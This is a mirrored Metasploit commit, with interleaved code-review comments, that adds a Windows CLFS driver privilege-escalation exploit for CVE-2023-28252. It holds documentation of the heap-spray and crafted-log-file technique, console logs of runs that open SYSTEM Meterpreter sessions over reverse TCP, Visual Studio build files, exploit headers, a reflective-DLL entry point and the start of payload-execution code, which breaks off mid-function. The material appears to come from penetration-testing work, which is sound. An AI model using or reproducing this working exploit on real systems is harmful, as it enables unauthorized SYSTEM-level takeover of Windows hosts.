mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Land #18250, CVE-2023-28252: Windows CLFS Driver Privilege Escalation
commit 8b56dc0117
BIN
data/exploits/CVE-2023-28252/CVE-2023-28252.x64.dll
Executable file
Binary file not shown.
@ -0,0 +1,129 @@
## Vulnerable Application

A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on
Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

The clfs.sys driver contains a function CreateLogFile that is used to create
open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which
contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a
.blf file. However, these files can be edited with CreateFileA or with fopen and then modified with
WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.

This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique
mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of
bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe
that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially
crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.

The exploits creates a controlled memory space by first looping over the CreatePipe function to
to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of
pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the
0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.

This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in
depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).

### Installation And Setup
Windows 11 versions 21H2 are vulnerable out of the box.
This exploit module has been tested on Windows 11 versions 21H2 build 22000.

## Options

## Verification Steps

1. Start msfconsole
1. Get a Meterpreter session on a vulnerable host
1. Do: `use windows/local/cve_2023_28252_clfs_driver`
1. Set the `SESSION` and `PAYLOAD` options
1. Do: `run`
1. You should get a privileged session.

## Scenarios

### Windows Server 2022 Build 20348 x64
```
msf6 exploit(multi/handler) > use windows/local/cve_2023_28252_clfs_driver
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run

[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching msiexec to host the DLL...
[+] Process 6080 launched.
[*] Reflectively injecting the DLL into 6080...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 172.16.199.134
[*] Meterpreter session 11 opened (172.16.199.1:4443 -> 172.16.199.134:49864) at 2023-07-31 13:44:35 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-2EEL7BRDUD8
OS : Windows 2016+ (10.0 Build 20348).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```

### Windows 11 Version 21H2 Build 22000 x64
```
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > sessions -i 1
[*] Starting interaction with 1...
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.22000.0 which has a vulnerable version of clfs.sys installed by default
[*] Checking compatibility
[*] Launching netsh to host the DLL...
[+] Process 9124 launched.
[*] Reflectively injecting the DLL into 9124...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 172.16.199.132
[*] Meterpreter session 4 opened (172.16.199.1:4443 -> 172.16.199.132:49894) at 2023-07-31 11:24:01 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MSFDEVICE
OS : Windows 10 (10.0 Build 22000).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```

### Windows 10 Version 19042 x64
```
msf6 exploit(multi/handler) > use windows/local/cve_2023_28252_clfs_driver
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > run

[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.19042.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching netsh to host the DLL...
[+] Process 4888 launched.
[*] Reflectively injecting the DLL into 4888...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 172.16.199.131
[*] Meterpreter session 13 opened (172.16.199.1:4443 -> 172.16.199.131:49840) at 2023-07-31 14:34:37 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-8ATHH6O
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```
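Review bot: the Installation And Setup section contradicts the rest of the document: it names only Windows 11 21H2 as vulnerable and tested, while Vulnerable Application also lists Windows 10 21H2 and Windows Server 2022 build 20348, and the Scenarios section shows successful runs on Server 2022 build 20348 and Windows 10 build 19042; list every build the module was actually tested on there. The Options section is empty; either document the module options (the verification steps only mention `SESSION` and `PAYLOAD`) or drop the heading. Wording fixes while here: "makes use to two" should be "makes use of two", "specially crafted read the SYSTEM token" should be "specially crafted to read the SYSTEM token", "The exploits creates" should be "The exploit creates", and the doubled "to" across the line break in "CreatePipe function to / to create thousands" should go.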
31
external/source/exploits/CVE-2023-28252/CVE-2023-28252.sln
vendored
Executable file
@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.33801.447
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-28252", "CVE-2023-28252\CVE-2023-28252.vcxproj", "{C1983EC8-C84D-4284-85CA-AF4F06AE0398}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x64.ActiveCfg = Debug|x64
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x64.Build.0 = Debug|x64
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x86.ActiveCfg = Debug|Win32
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Debug|x86.Build.0 = Debug|Win32
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x64.ActiveCfg = Release|x64
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x64.Build.0 = Release|x64
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x86.ActiveCfg = Release|Win32
{C1983EC8-C84D-4284-85CA-AF4F06AE0398}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {3FD03BC0-5F34-4393-AEB8-3B2F1EC49E5B}
EndGlobalSection
EndGlobal
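Review bot: the solution declares Debug|x86 and Release|x86 configurations, but the commit ships only `data/exploits/CVE-2023-28252/CVE-2023-28252.x64.dll` and the documentation lists x64 targets only; drop the x86 configurations (or say in the project that they are unsupported) so nobody builds a 32-bit binary the module has no use for.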
240
external/source/exploits/CVE-2023-28252/CVE-2023-28252/CVE-2023-28252.vcxproj
vendored
Executable file
@ -0,0 +1,240 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{c1983ec8-c84d-4284-85ca-af4f06ae0398}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CVE_2023_28252</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<TreatWarningAsError>false</TreatWarningAsError>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableUAC>false</EnableUAC>
<GenerateMapFile>true</GenerateMapFile>
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\..\include\windows;..\..\include\windows;..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<TreatWarningAsError>false</TreatWarningAsError>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableUAC>false</EnableUAC>
<GenerateMapFile>true</GenerateMapFile>
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<SDLCheck>
</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatWarningAsError>false</TreatWarningAsError>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableUAC>false</EnableUAC>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<GenerateMapFile>false</GenerateMapFile>
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<SDLCheck>
</SDLCheck>
<PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>false</ConformanceMode>
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatWarningAsError>false</TreatWarningAsError>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableUAC>false</EnableUAC>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<GenerateMapFile>false</GenerateMapFile>
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="clfs_eop.cpp" />
<ClCompile Include="dllmain.cpp" />
<ClCompile Include="exploit.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="clfs_eop.h" />
<ClInclude Include="crc32.h" />
<ClInclude Include="exploit.h" />
<ClInclude Include="ntos.h" />
</ItemGroup>
<ItemGroup>
<Library Include="ntoskrnl.lib" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
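Review bot: only the Release|x64 configuration sets ConfigurationType to DynamicLibrary; Debug|Win32, Release|Win32 and Debug|x64 all build an Application, so a Debug|x64 build does not produce a DLL that the module can reflectively inject. Make every configuration that is kept a DynamicLibrary (or remove the unsupported ones). Two smaller inconsistencies: the Release|x64 linker SubSystem is Console while the other three configurations use Windows, and every ClCompile group sets PrecompiledHeaderFile to stdafx.h although PrecompiledHeader is NotUsing and no stdafx.h appears in the ClInclude list; drop the PrecompiledHeaderFile entries.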
1417
external/source/exploits/CVE-2023-28252/CVE-2023-28252/clfs_eop.cpp
vendored
Executable file
File diff suppressed because it is too large
121
external/source/exploits/CVE-2023-28252/CVE-2023-28252/clfs_eop.h
vendored
Executable file
@ -0,0 +1,121 @@
//
//
#pragma warning (disable : 4005)
#pragma warning(disable:28159)

#pragma once
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <clfsw32.h>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <tlhelp32.h>
#include "ntos.h"
#include "crc32.h"

#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Clfsw32.lib")

VOID FindKernelModulesBase();

//
// NT syscalls
//
#define SystemModuleInformation 0xb
#define SystemHandleInformation 0x10


typedef struct _SYSTEM_BIGPOOL_ENTRY {
union {
PVOID VirtualAddress;
ULONG_PTR NonPaged : 1;
};
SIZE_T SizeInBytes;
union {
UCHAR Tag[4];
ULONG TagUlong;
};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;


typedef struct _SYSTEM_BIGPOOL_INFORMATION {
ULONG Count;
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;


typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);

typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);



//
// Version dependent offsets
//
#define OFFSET_OF_PREVIOUS_MODE 0x232
#define OFFSET_OF_WIN32PROCESS 0x3b0
#define OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40
#define OFFSET_OF_DCOMPOSITIONPROCESS 0x100


//
// CInteractionTrackerMarshaler object offsets
//
#define OFFSET_OF_FUNCTION 0x50
#define OBJECT_SIZE 0x1a0
typedef NTSTATUS func(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
typedef NTSTATUS func3(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);


class clfs_eop
{
public:

clfs_eop() {};
~clfs_eop() {};

//int crcCalculatorAndFix(char*, int);

void fun_pipeSpray(int value, UINT64* temp_buffer);

void getVirtualAddress();

SIZE_T GetObjectKernelAddress(HANDLE Object);

VOID InitEnvironment();

int createInitialLogFile();

UINT64 getBigPoolInfo();

VOID craftbaseFile(FILE* pfile);

VOID craftSprayFile(FILE* pfile);

int FixCRCFile(WCHAR* _stored_temp_open);

int crcCalculatorAndFix(char* mybuf, int mysize);

int doFirstAlloc();

VOID FindKernelModulesBase();

void manage_args(int argc, TCHAR* argv[]);

VOID RunPayload();

void fun_prepare();

WCHAR* logFileNames(int _i);

WCHAR* containerNames(int _i);

WCHAR* fileNames(int _i);

int fun_trigger(WCHAR* _logfilename, WCHAR* _fopenfilename);

void to_trigger();

};
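Review bot: several declarations look like leftovers from another exploit template and should be removed before landing: `typedef NTSTATUS func(...)` and `typedef NTSTATUS func3(...)` are identical, the "CInteractionTrackerMarshaler object offsets" block (OFFSET_OF_FUNCTION, OBJECT_SIZE) and OFFSET_OF_WIN32PROCESS / OFFSET_OF_DCOMPOSITIONPROCESS have no connection to CLFS, `VOID FindKernelModulesBase();` is declared at file scope and again as a member, and `//int crcCalculatorAndFix(char*, int);` is dead. The remaining version dependent offsets (OFFSET_OF_PREVIOUS_MODE 0x232, OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40) are hard-coded with no comment saying which builds they were taken from; document the builds they match, since the module's check only gates on the clfs.sys version. Also `#define SystemModuleInformation 0xb` and `#define SystemHandleInformation 0x10` are macros redefining names that the SYSTEM_INFORMATION_CLASS enumeration already carries; if that is what forces `#pragma warning (disable : 4005)`, use the enumerators and drop the pragma.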
45
external/source/exploits/CVE-2023-28252/CVE-2023-28252/crc32.h
vendored
Executable file
@ -0,0 +1,45 @@
#pragma once

#include <stdint.h>


struct crc32
{
static void generate_table(uint32_t(&table)[256])
{
uint32_t polynomial = 0xEDB88320;
for (uint32_t i = 0; i < 256; i++)
{
uint32_t c = i;
for (size_t j = 0; j < 8; j++)
{
if (c & 1) {
c = polynomial ^ (c >> 1);
}
else {
c >>= 1;
}
}
table[i] = c;
}
}

static uint32_t update(uint32_t(&table)[256], uint32_t initial, const void* buf, size_t len)
{
uint32_t c = initial ^ 0xFFFFFFFF;
const uint8_t* u = static_cast<const uint8_t*>(buf);
for (size_t i = 0; i < len; ++i)
{
c = table[(c ^ u[i]) & 0xFF] ^ (c >> 8);
}
return c ^ 0xFFFFFFFF;
}
};


// usage: the following code generates crc for 2 pieces of data
// uint32_t table[256];
// crc32::generate_table(table);
// uint32_t crc = crc32::update(table, 0, data_piece1, len1);
// crc = crc32::update(table, crc, data_piece2, len2);
// output(crc);
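Review bot: `size_t` is used in both `generate_table` and `update` but the header only includes `<stdint.h>`; add `#include <stddef.h>` so it does not depend on include order. The routine itself is the standard reflected CRC-32 (polynomial 0xEDB88320, inverted on entry and exit), and because `update` XORs `initial` with 0xFFFFFFFF both on entry and on return, chaining calls as the usage comment shows gives the same value as one call over the concatenated buffer; a one-line comment saying so would save the next reader from re-deriving it.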
44
external/source/exploits/CVE-2023-28252/CVE-2023-28252/dllmain.cpp
vendored
Executable file
@ -0,0 +1,44 @@
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#define DEBUGTRACE 1

#include "ReflectiveLoader.c"
#include "definitions.h"
#include "common.h"

#include <stdio.h>
#include <stdint.h>
#include <windows.h>

DWORD Exploit(PMSF_PAYLOAD pPayload);

void main(PMSF_PAYLOAD lpReserved) {
dprintf("In dllmain main method, heading to exploit method");
Exploit(lpReserved);
return;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
PMSF_PAYLOAD payload = (PMSF_PAYLOAD)lpReserved;
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL)
{
*(HMODULE*)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
main(payload);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}

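Review bot: `#define DEBUGTRACE 1` is unconditional, so the shipped Release DLL is built with dprintf tracing compiled in; guard it with `#ifdef _DEBUG` or remove it before landing. `void main(PMSF_PAYLOAD lpReserved)` is a non-standard signature for a function named `main`; rename it (RunExploit, for instance) so it is not mistaken for the process entry point. Also `Exploit()` returns a DWORD that is discarded both here and in DllMain; propagate it so DLL_PROCESS_ATTACH can report failure instead of always returning TRUE.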
66
external/source/exploits/CVE-2023-28252/CVE-2023-28252/exploit.cpp
vendored
Executable file
@ -0,0 +1,66 @@
#pragma once
#include "common.h"
#include "clfs_eop.h"
#include "exploit.h"
#include <tchar.h>

void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pPayload) {
exit;
}

CopyMemory(pPayload, &pMsfPayload->cPayloadData, pMsfPayload->dwSize);

// Get the current process token
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE, &hToken)) {
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
exit;
}

// Duplicate the token
HANDLE hDupToken;
if (!DuplicateToken(hToken, SecurityImpersonation, &hDupToken)) {
CloseHandle(hToken);
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
exit;
}

// Close the original token handle
CloseHandle(hToken);

// Create thread to execute payload code
